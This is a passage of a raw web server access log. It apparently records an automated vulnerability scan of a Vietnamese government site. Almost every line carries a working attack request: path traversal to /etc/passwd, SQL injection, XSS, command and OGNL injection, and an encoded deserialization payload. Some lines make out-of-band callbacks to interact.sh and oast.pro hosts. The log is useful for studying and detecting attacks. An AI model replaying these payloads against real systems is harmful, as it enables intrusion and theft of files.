- 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 64 1112 2023-11-09 21:14:43 103.153.214.94 GET /%2f%5cinteract.sh%2fa%3fb/ - 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 11 0 403 2023-11-09 21:15:00 103.153.214.94 GET /index.php/admin/filemanager/sa/getZipFile path=/../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 365 2023-11-09 21:15:30 103.153.214.94 GET /index.php redirect=/\/interact.sh/ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 405 2023-11-09 21:15:32 103.153.214.94 GET /index.php redirect=//interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 401 2023-11-09 21:16:12 103.153.214.94 POST /mailingupgrade.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 366 2023-11-09 21:16:15 103.153.214.94 GET /wp-content/plugins/chopslider/get_script/index.php id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 429 2023-11-09 21:16:16 103.153.214.94 GET /ucmdb-api/connect - 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 1115 2023-11-09 21:16:30 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 404 2023-11-09 21:16:38 103.153.214.94 GET /awcuser/cgi-bin/vcs_access_file.cgi file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 407 2023-11-09 21:18:25 103.153.214.94 GET /does_not_exist""><script>alert(document.domain)</script><img+src=x - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 409 2023-11-09 21:18:41 103.153.214.94 GET / s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 405 2023-11-09 21:18:41 103.153.214.94 GET /cgi-bin/ExportAllSettings.sh - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 402 2023-11-09 21:19:11 103.153.214.94 POST /v2/api/product/manger/getInfo - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 2352 2023-11-09 21:19:16 103.153.214.94 GET /wp-admin/admin-ajax.php action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 403 2023-11-09 21:19:17 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 405 2023-11-09 21:19:20 103.153.214.94 GET /wp-admin/admin-ajax.php action=duplicator_download&file=%2F..%2Fwp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 374 2023-11-09 21:20:05 103.153.214.94 GET /public/login.htm type=probes 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 405 2023-11-09 21:20:05 103.153.214.94 GET /login.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 376 2023-11-09 21:20:05 103.153.214.94 GET /login.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 387 2023-11-09 21:20:07 103.153.214.94 GET /public/login.htm type=requests 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 360 2023-11-09 21:20:12 103.153.214.94 GET /public/login.htm type=treestat 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 375 2023-11-09 21:22:37 103.153.214.94 GET /files/ldap.debug.txt - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 408 2023-11-09 21:23:55 103.153.214.94 GET /api/experimental/test - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 3844 2023-11-09 21:23:55 103.153.214.94 POST /cgi-bin/login.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 1891 2023-11-09 21:23:59 103.153.214.94 GET /api/experimental/dags/example_trigger_target_dag/paused/false - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 0 2 369 2023-11-09 21:24:03 103.153.214.94 POST /api/experimental/dags/example_trigger_target_dag/dag_runs - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 0 2 365 2023-11-09 21:24:08 103.153.214.94 POST /ajax/api/content_infraction/getIndexableContent - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 361 2023-11-09 21:25:43 103.153.214.94 GET / cda'"</script><script>alert(document.domain)</script>&locale=locale=de-DE 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 412 2023-11-09 21:25:46 103.153.214.94 GET /fw.progrss.details.php popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 401 2023-11-09 21:26:02 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 370 2023-11-09 21:26:05 103.153.214.94 GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2XwZKr1Ia0PkH8y5p3oowV0eKyf.txt - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 403 2023-11-09 21:27:53 103.153.214.94 GET /wp-json/acf/v3/options/a id=active&field=plugins 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 371 2023-11-09 21:27:53 103.153.214.94 GET /webadmin/tools/unixlogin.php login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6c6833576b74505345527657456c314e7a51775a32463462307852536d5a6b6230315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn/webadmin/admin/service_manager_data.php 200 0 0 1875 2023-11-09 21:27:55 103.153.214.94 GET /webadmin/out - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn/webadmin/admin/service_manager_data.php 200 0 0 364 2023-11-09 21:28:17 103.153.214.94 GET /OneView/view/center a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain) 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 384 2023-11-09 21:28:21 103.153.214.94 GET /api/experimental/latest_runs - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 0 2 2347 2023-11-09 21:28:24 103.153.214.94 GET /avatar/1?d=http:%2F%2Fimgur.com%2F..%252F1.1.1.1 - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 11 0 361 2023-11-09 21:28:32 103.153.214.94 GET /grafana/avatar/1?d=http:%2F%2Fimgur.com%2F..%252F1.1.1.1 - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 11 0 1508 2023-11-09 21:28:46 103.153.214.94 POST /pandora_console/ajax.php page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 364 2023-11-09 21:28:56 103.153.214.94 GET /kylin/api/admin/config - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 365 2023-11-09 21:29:35 103.153.214.94 GET /bitrix/components/bitrix/mobileapp.list/ajax.php/ AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 363 2023-11-09 21:29:39 103.153.214.94 GET /bitrix/components/bitrix/mobileapp.list/ajax.php/ AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 364 2023-11-09 21:31:23 103.153.214.94 POST /context.json - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 365 2023-11-09 21:31:25 103.153.214.94 GET /secure/QueryComponent!Default.jspa - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 362 2023-11-09 21:31:29 103.153.214.94 GET / cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 403 2023-11-09 21:31:31 103.153.214.94 POST /module/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 https://bcvt.kontum.gov.vnadmin/view:modules/load_module:users 405 0 1 360 2023-11-09 21:31:34 103.153.214.94 POST /module/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vnadmin/view:modules/load_module:users 405 0 1 388 2023-11-09 21:31:37 103.153.214.94 POST /module/ - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vnadmin/view:modules/load_module:users 405 0 1 361 2023-11-09 21:31:47 103.153.214.94 GET /secure/ViewUserHover.jspa - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 365 2023-11-09 21:32:25 103.153.214.94 GET /user/login - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 409 2023-11-09 21:32:40 103.153.214.94 POST /lib/crud/userprocess.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 362 2023-11-09 21:32:47 103.153.214.94 GET /login.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 362 2023-11-09 21:32:50 103.153.214.94 POST /lib/crud/userprocess.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 418 2023-11-09 21:33:04 103.153.214.94 GET /auth/login to=/92874%27;alert(document.domain)//280 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 363 2023-11-09 21:33:19 103.153.214.94 GET /Devices-Config.php sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 366 2023-11-09 21:33:28 103.153.214.94 POST /apisix/admin/routes - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 2 373 2023-11-09 21:33:32 103.153.214.94 GET /2XwZKyzeo5SAkYscNEji37KngQy cmd=id 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 370 2023-11-09 21:35:22 103.153.214.94 POST /console/css/%2e%2e%2fconsole.portal - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 11 0 2153 2023-11-09 21:35:52 103.153.214.94 GET /console/images/%2e%2e%2fconsole.portal _nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cl6fbhsfe7k9sg331pogn3hjt68yzy5tk.oast.pro') 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 11 0 2190 2023-11-09 21:37:03 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 370 2023-11-09 21:37:12 103.153.214.94 POST /console/images/%2e%2e%2fconsole.portal - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 11 0 375 2023-11-09 21:37:23 103.153.214.94 GET /analytics/saw.dll bieehome&startPage=1 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 363 2023-11-09 21:37:26 103.153.214.94 GET /analytics/saw.dll getPreviewImage&previewFilePath=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 1023 2023-11-09 21:37:32 103.153.214.94 GET /index.php r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 1104 2023-11-09 21:38:09 103.153.214.94 GET /nette.micro/ callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 365 2023-11-09 21:40:03 103.153.214.94 GET / key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 367 2023-11-09 21:40:39 103.153.214.94 POST /mifs/.;/services/LogService - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 367 2023-11-09 21:41:28 103.153.214.94 GET /user/login - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 365 2023-11-09 21:41:43 103.153.214.94 GET /info.php RESULT=",msgArray);alert(document.domain);// 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 1108 2023-11-09 21:41:46 103.153.214.94 POST /run - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 382 2023-11-09 21:42:03 103.153.214.94 POST /PDC/ajaxreq.php PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 362 2023-11-09 21:42:12 103.153.214.94 GET / s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 370 2023-11-09 21:42:39 103.153.214.94 GET /include/exportUser.php type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Ezgom.txt 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 389 2023-11-09 21:42:41 103.153.214.94 GET /include/zgom.txt - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 363 2023-11-09 21:42:57 103.153.214.94 GET /carbon/admin/login.jsp msgId=%27%3Balert(%27document.domain%27)%2F%2F 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 367 2023-11-09 21:44:42 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 2313 2023-11-09 21:45:49 103.153.214.94 POST /cgi-bin/login.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 371 2023-11-09 21:45:51 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 363 2023-11-09 21:45:52 103.153.214.94 POST /cgi-bin/system_log.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 363 2023-11-09 21:46:04 103.153.214.94 GET /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 11 0 361 2023-11-09 21:46:49 103.153.214.94 GET / id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 375 2023-11-09 21:47:00 103.153.214.94 GET /error msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 365 2023-11-09 21:47:52 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 402 2023-11-09 21:47:55 103.153.214.94 GET /admin/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 367 2023-11-09 21:47:55 103.153.214.94 GET /cyrus.index.php service-cmds-peform=%7C%7Cwhoami%7C%7C 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 386 2023-11-09 21:47:58 103.153.214.94 GET /admin/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 364 2023-11-09 21:48:15 103.153.214.94 POST /jars/upload - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 392 2023-11-09 21:48:17 103.153.214.94 GET /newVersion callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 363 2023-11-09 21:48:17 103.153.214.94 GET 